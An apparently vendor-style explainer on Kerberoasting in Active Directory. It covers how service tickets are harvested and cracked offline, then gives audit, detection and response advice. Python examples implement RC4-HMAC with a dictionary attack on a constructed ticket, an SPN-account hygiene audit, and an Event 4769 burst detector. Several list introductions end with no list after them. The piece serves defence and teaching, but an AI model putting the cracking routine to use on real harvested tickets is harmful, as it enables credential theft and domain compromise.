A Kerberoasting attack is a way for an attacker who already holds any Active Directory account to obtain the passwords of service accounts, and then use those credentials to move through the domain and steal data. The term is a play on words: it abuses Kerberos, the network authentication protocol designed to authenticate clients and services to each other across an untrusted network such as the internet.
During a Kerberoasting attack, a threat actor uses a compromised (or simply low-privileged) domain account to request Kerberos service tickets for accounts that have a Service Principal Name (SPN) registered. Part of each ticket is encrypted with a key derived from that service account's password, so the attacker can take the tickets away and recover the passwords offline by guessing candidates and checking which one decrypts the ticket. No further contact with the domain controller is needed, and nothing limits the guessing except the password's strength and the encryption type used. Making privilege escalation harder blunts the attack, but it only takes compromising one ordinary user account for an attacker to start harvesting tickets.
Kerberoasting attacks are prevalent because the requests look legitimate: every ticket request comes from an authenticated domain user doing something Kerberos is designed to permit. Compromised or stolen credentials are often discovered late, and the longer a threat actor can pose as a legitimate user of the network, the more time that person or group has to explore and access or steal data at will.
Indeed, the Cybersecurity and Infrastructure Security Agency (CISA) of the United States government has described Kerberoasting as one of the most time-efficient ways to elevate privileges and move laterally, unchecked, throughout a network.
Kerberoasting attacks work by leveraging the Kerberos authentication protocol to:
Kerberoasting attacks don't require an administrator account or even elevated privileges. What makes this type of attack particularly attractive is that any domain user account will do: Kerberos lets every authenticated principal request a service ticket for any registered SPN from the Ticket Granting Service (TGS) on the domain controller, and the KDC issues it without checking whether the requester will ever actually talk to that service.
Once an attacker controls a user account, they do not need to log in to any other host. With a single domain-joined session, or just network access to a domain controller plus the account's password or hash, they can query LDAP for every account that has an SPN and request a service ticket for each one. The worthwhile targets are user accounts running services (SQL Server, IIS, backup and monitoring agents and the like), because their passwords are human-chosen and rarely rotated. Computer accounts also carry SPNs, but their long random machine passwords are not practically crackable.
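To make the "crack offline" step concrete, here is an added example that is not code from the original page, from Rapid7, or from Microsoft. It implements the RC4-HMAC (etype 23) encryption that Kerberos uses when a service account still accepts RC4, as specified in RFC 4757, and then runs a dictionary attack against a ticket constructed here with a deliberately weak password. The service name, password and wordlist are assumptions chosen for the demonstration; no KDC is contacted.

```python
"""Why a harvested service ticket can be cracked offline.

Added example, not code from the original page, Rapid7, or Microsoft. It
implements the RC4-HMAC (etype 23) scheme from RFC 4757 and runs a dictionary
attack on a ticket constructed here with a weak password. No KDC is contacted.
"""
import hmac
import os
import struct
from hashlib import md5
from typing import Iterable, Optional

MASK32 = 0xFFFFFFFF
KEY_USAGE_TICKET = 2  # key usage for the ticket enc-part in a TGS-REP (RFC 4120, 7.5.1)


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib often lacks MD4 on OpenSSL 3 builds."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda v, s: ((v << s) | (v >> (32 - s))) & MASK32
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC long-term key is the NT hash: MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 stream cipher (key scheduling followed by keystream generation)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: Optional[bytes] = None) -> bytes:
    """RFC 4757 section 6: output is checksum || RC4(K3, confounder || plaintext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))  # usage-specific key
    data = (confounder or os.urandom(8)) + plaintext
    checksum = _hmac_md5(k1, data)
    k3 = _hmac_md5(k1, checksum)                   # per-message RC4 key
    return checksum + rc4(k3, data)


def rc4_hmac_decrypt(key: bytes, usage: int, ciphertext: bytes) -> Optional[bytes]:
    """Return the plaintext (confounder removed), or None if the checksum does not verify."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    checksum, edata = ciphertext[:16], ciphertext[16:]
    data = rc4(_hmac_md5(k1, checksum), edata)
    if not hmac.compare_digest(_hmac_md5(k1, data), checksum):
        return None
    return data[8:]


def crack_ticket(enc_part: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: only the real service-account password makes the checksum verify.
    This is the same check hashcat mode 13100 and John's krb5tgs format perform at scale."""
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), KEY_USAGE_TICKET, enc_part) is not None:
            return candidate
    return None


# Constructed sample: a ticket for a service account whose (weak) password is in the wordlist.
SAMPLE_PLAINTEXT = b"EncTicketPart for MSSQLSvc/db01.corp.local (constructed)"
SAMPLE_TICKET = rc4_hmac_encrypt(nt_hash("Summer2019!"), KEY_USAGE_TICKET, SAMPLE_PLAINTEXT)
SAMPLE_WORDLIST = ["password", "Welcome1", "Summer2019!", "P@ssw0rd"]

if __name__ == "__main__":
    print(crack_ticket(SAMPLE_TICKET, SAMPLE_WORDLIST))
```

Each guess costs one MD4 and three HMAC-MD5 operations, which is why RC4 tickets crack at hundreds of millions of guesses per second on a GPU. With AES (etypes 17 and 18) the key is derived from the password with PBKDF2 at 4,096 iterations (RFC 3962), so every guess is orders of magnitude more expensive; a weak password is still recoverable, but a long random one is not.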
Because the attacker holds a valid identity, subsequent actions such as lateral movement and exfiltration can happen right "under the noses" of the security organization and the business at large. If the cracked account is privileged, the impersonation also exposes the business to liability for everything done in that account's name, even if the attacker is caught relatively quickly.
Unchecked lateral movement is a serious risk for any organization, which is why tooling that detects this subtle, risky behaviour early matters more than ever.
There are many different executions of Kerberoasting attacks, so let's zoom in on the inner-workings of one execution in particular:
According to CISA, Kerberoasting is a preferred technique of Russian state-sponsored Advanced Persistent Threat (APT) actors, who have been observed carrying out the methodology described above.
Once an attacker holds a properly credentialed account, lateral movement looks like ordinary use of that account, so in theory they can move through the network with ease. Detecting the malicious activity is no small task, particularly with false-positive alerts constantly firing, if the data theft is carried out with skill.
This is where relying solely on MITRE ATT&CK detection guidance becomes a challenge. The recommended data source for Kerberoasting (T1558.003) is Windows Security Event ID 4769, which is logged for every legitimate service ticket request as well, so on its own it is extremely noisy. Extra steps are needed to filter that noise down to signal: excluding computer accounts and krbtgt, weighting requests that use RC4 encryption (type 0x17), and looking for one account requesting tickets for many distinct SPNs in a short window. Rapid7's InsightIDR can help to achieve this by:
Preventing Kerberoasting attacks comes down mostly to the service accounts themselves, because the attacker's only real obstacle is how long the password takes to crack. Use long, randomly generated passwords for every account that carries an SPN; group Managed Service Accounts (gMSAs) do this automatically and rotate the password for you. Enable AES and remove RC4 from each account's supported encryption types so tickets are never issued with the cheap-to-crack type 23. And keep SPN-bearing accounts out of privileged groups, so that a cracked service account does not also turn out to be a domain administrator.
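The following added example (not code from the original page or from Rapid7) turns those three controls into an audit over SPN-bearing accounts. The account records are constructed here in the shape of the LDAP attributes involved (servicePrincipalName, msDS-SupportedEncryptionTypes, pwdLastSet, adminCount, objectClass); in a real domain you would pull them with the filter `(&(objectCategory=person)(servicePrincipalName=*))` and pass them to `audit_accounts()`. The names and dates are assumptions for the demonstration.

```python
"""Hygiene audit of SPN-bearing accounts, the accounts Kerberoasting targets.

Added example, not code from the original page or from Rapid7. The records are
constructed in the shape of the LDAP attributes involved; they are not real
directory data.
"""
from datetime import datetime, timedelta
from typing import Dict, Iterable, List

# Bits of msDS-SupportedEncryptionTypes
DES_CBC = 0x3      # DES-CBC-CRC | DES-CBC-MD5
RC4_HMAC = 0x4     # etype 23, the type Kerberoasting tooling asks for
AES128 = 0x8
AES256 = 0x10
GMSA_CLASS = "msDS-GroupManagedServiceAccount"
AUDIT_DATE = datetime(2024, 6, 1)  # constructed reference date for the sample

# Constructed sample accounts (not real directory data).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc_sql", "objectClass": "user",
     "servicePrincipalName": ["MSSQLSvc/db01.corp.local:1433"],
     "msDS-SupportedEncryptionTypes": RC4_HMAC | AES256,
     "pwdLastSet": datetime(2017, 3, 1), "adminCount": 1},
    {"sAMAccountName": "svc_web", "objectClass": "user",
     "servicePrincipalName": ["HTTP/portal.corp.local"],
     "msDS-SupportedEncryptionTypes": AES128 | AES256,
     "pwdLastSet": datetime(2024, 1, 10), "adminCount": 0},
    {"sAMAccountName": "gmsa_backup$", "objectClass": GMSA_CLASS,
     "servicePrincipalName": ["backup/bk01.corp.local"],
     "msDS-SupportedEncryptionTypes": AES256,
     "pwdLastSet": datetime(2022, 5, 1), "adminCount": 0},  # DC rotates it; age is fine
    {"sAMAccountName": "svc_legacy", "objectClass": "user",
     "servicePrincipalName": ["ftp/old01.corp.local"],
     "msDS-SupportedEncryptionTypes": None,                 # attribute never set
     "pwdLastSet": datetime(2023, 9, 1), "adminCount": 0},
]


def audit_account(acct: Dict, now: datetime, max_age: timedelta = timedelta(days=365)) -> List[str]:
    """Return the Kerberoasting-relevant findings for one SPN-bearing account."""
    findings = []
    etypes = acct.get("msDS-SupportedEncryptionTypes")
    if etypes is None:
        findings.append("msDS-SupportedEncryptionTypes unset: the negotiated type falls back to the DC "
                        "default; set it explicitly to AES (0x18) so RC4 cannot be chosen")
    else:
        if etypes & RC4_HMAC:
            findings.append("RC4-HMAC enabled: tickets can be issued as etype 23 and cracked offline")
        if etypes & DES_CBC:
            findings.append("DES enabled: trivially breakable")
        if not etypes & (AES128 | AES256):
            findings.append("no AES type enabled")
    is_gmsa = acct.get("objectClass") == GMSA_CLASS
    age = now - acct["pwdLastSet"]
    if not is_gmsa and age > max_age:
        findings.append(f"password is {age.days} days old and human-managed: rotate to a long random "
                        "value or convert the service to a gMSA")
    if acct.get("adminCount") == 1:
        findings.append("adminCount=1: a privileged account exposes an SPN; cracking it yields admin rights")
    return findings


def audit_accounts(accounts: Iterable[Dict], now: datetime) -> Dict[str, List[str]]:
    """Map each account name to its findings; an empty list means the account passed."""
    return {a["sAMAccountName"]: audit_account(a, now) for a in accounts}


def audit_sample() -> Dict[str, List[str]]:
    return audit_accounts(SAMPLE_ACCOUNTS, AUDIT_DATE)


if __name__ == "__main__":
    for name, findings in audit_sample().items():
        print(name, "OK" if not findings else "; ".join(findings))
```

The gMSA is exempt from the password-age check on purpose: the domain controller generates its 240-character password and rotates it every 30 days by default, which is exactly the property a human-managed service account lacks.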
Now, let's turn to proper response when an in-progress Kerberoasting attack is detected. It is easy to imagine the worst case: the threat actor has impersonated a properly credentialed individual, has had access for far too long, and has potentially stolen far too much data.
Once a few deep breaths have been taken, the following steps can help launch a proper response:
MFA is often recommended against Kerberoasting, but it is worth being precise about what it does and does not stop. The attack involves no logon to the targeted service: the attacker requests tickets with an account they already control and cracks them offline, and service accounts themselves cannot use MFA. What MFA does do is make the initial compromise of an ordinary user account, the foothold every Kerberoasting attack starts from, considerably harder, and it protects the privileged accounts an attacker would pivot to afterwards. From an enterprise standpoint, the challenge is rolling MFA out to an entire employee base and getting it adopted as a routine safeguard.
Even though these checks seem like common knowledge, many businesses around the world still lack basic password and credential hygiene, MFA included.
It's disappointing when threat actors turn a security protocol like Kerberos into a tool for stealing data, but that doesn't mean the protocol should be cast aside; Kerberos remains critical for authenticating users securely in an insecure environment. What Kerberoasting exploits is weak service account passwords and legacy RC4 encryption, not a flaw in the protocol's design.
As mentioned above, detection that catches the ticket-harvesting phase early is an effective countermeasure. For instance, InsightIDR from Rapid7 continuously baselines user activity so that suspicious behaviour, such as an account that has never requested service tickets suddenly requesting dozens, is detected more easily and faster.
It can also incorporate external threat intelligence for detections beyond the network perimeter, from the nearest endpoint to the dark web. Regardless of the product or solution a security organization chooses for thwarting Kerberoasting and APT actors, keep in mind that it is easier than ever to infiltrate a network while masquerading as an employee.
How is this typically done? Through stolen credentials. That is why continuous user and entity behavior analytics (UEBA) that ties activity across the network to specific users matters: when a user behaves unusually, analysts see it quickly and investigate. The unusual actor could also be a real employee who, knowingly or unknowingly, presents some kind of risk.
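As an added example of the kind of noise reduction described above (illustrative code, not InsightIDR's detection logic and not from the original page), here is a pass over constructed Windows Security Event ID 4769 records. Each record carries the fields a real 4769 event has (Account Name, Service Name, Ticket Encryption Type, Failure Code); the account names, service names and timestamps are assumptions. The rule drops failures, krbtgt and computer-account traffic, optionally keeps only RC4 (0x17) requests, and alerts when one account obtains tickets for many distinct SPN accounts inside a short window.

```python
"""Reducing Event ID 4769 noise to a Kerberoasting signal.

Added example, illustrative only; not InsightIDR's detection logic. The records
are constructed with the fields a Windows Security Event ID 4769 ("A Kerberos
service ticket was requested") carries; they are not real logs.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Tuple

RC4_HMAC = "0x17"  # Ticket Encryption Type: 0x17 = RC4-HMAC, 0x11/0x12 = AES128/AES256
SUCCESS = "0x0"    # Failure Code of a ticket that was actually issued

# Constructed sample: (time, Account Name, Service Name, Ticket Encryption Type, Failure Code)
SAMPLE_4769: List[Tuple[str, str, str, str, str]] = [
    ("2024-03-04T09:00:01", "jdoe", "svc_sql", "0x12", SUCCESS),      # normal AES request
    ("2024-03-04T09:00:05", "WIN10-01$", "DC01$", "0x12", SUCCESS),   # machine-to-machine, routine
    ("2024-03-04T09:01:00", "jdoe", "krbtgt", "0x12", SUCCESS),       # TGT traffic, not a service
    ("2024-03-04T10:00:00", "tsmith", "svc_sql", RC4_HMAC, SUCCESS),
    ("2024-03-04T10:00:01", "tsmith", "svc_iis", RC4_HMAC, SUCCESS),
    ("2024-03-04T10:00:01", "tsmith", "svc_backup", RC4_HMAC, SUCCESS),
    ("2024-03-04T10:00:02", "tsmith", "svc_sccm", RC4_HMAC, SUCCESS),
    ("2024-03-04T10:00:02", "tsmith", "svc_exchange", RC4_HMAC, SUCCESS),
    ("2024-03-04T10:00:03", "tsmith", "svc_vmware", RC4_HMAC, SUCCESS),
    ("2024-03-04T10:00:03", "tsmith", "svc_sap", RC4_HMAC, "0x1e"),   # rejected, never issued
    ("2024-03-04T10:30:00", "jdoe", "svc_iis", RC4_HMAC, SUCCESS),    # single legacy RC4 ticket
]


def is_relevant(account: str, service: str, failure: str) -> bool:
    """Drop what makes raw 4769 volume useless: failures, TGT traffic and computer accounts."""
    return (failure == SUCCESS
            and service.lower() != "krbtgt"
            and not service.endswith("$")
            and not account.endswith("$"))


def detect_kerberoasting(records: Iterable[Tuple[str, str, str, str, str]],
                         window: timedelta = timedelta(minutes=5),
                         min_distinct_services: int = 5,
                         rc4_only: bool = True) -> List[Dict]:
    """Alert on an account that obtained tickets for many distinct SPN accounts inside `window`.

    rc4_only keys on etype 0x17, the cheap-to-crack type tools such as Rubeus and
    GetUserSPNs.py request on purpose; set it False where RC4 is still common.
    """
    by_account = defaultdict(list)
    for ts, account, service, etype, failure in records:
        if is_relevant(account, service, failure) and (not rc4_only or etype == RC4_HMAC):
            by_account[account].append((datetime.fromisoformat(ts), service))
    alerts = []
    for account, events in by_account.items():
        events.sort()
        best = None
        for i, (start, _) in enumerate(events):
            burst = [e for e in events[i:] if e[0] - start <= window]
            services = sorted({svc for _, svc in burst})
            if len(services) >= min_distinct_services and (best is None or len(services) > len(best["services"])):
                best = {"account": account, "first": start.isoformat(),
                        "last": burst[-1][0].isoformat(), "services": services}
        if best:
            alerts.append(best)
    return alerts


def detect_sample() -> List[Dict]:
    return detect_kerberoasting(SAMPLE_4769)


if __name__ == "__main__":
    for alert in detect_sample():
        print(alert)
```

On the sample, jdoe's one RC4 ticket and the machine traffic produce nothing, while tsmith's burst of six distinct services in three seconds is flagged once, which is the behaviour a baseline of "this account never requests service tickets" would make stand out even sooner.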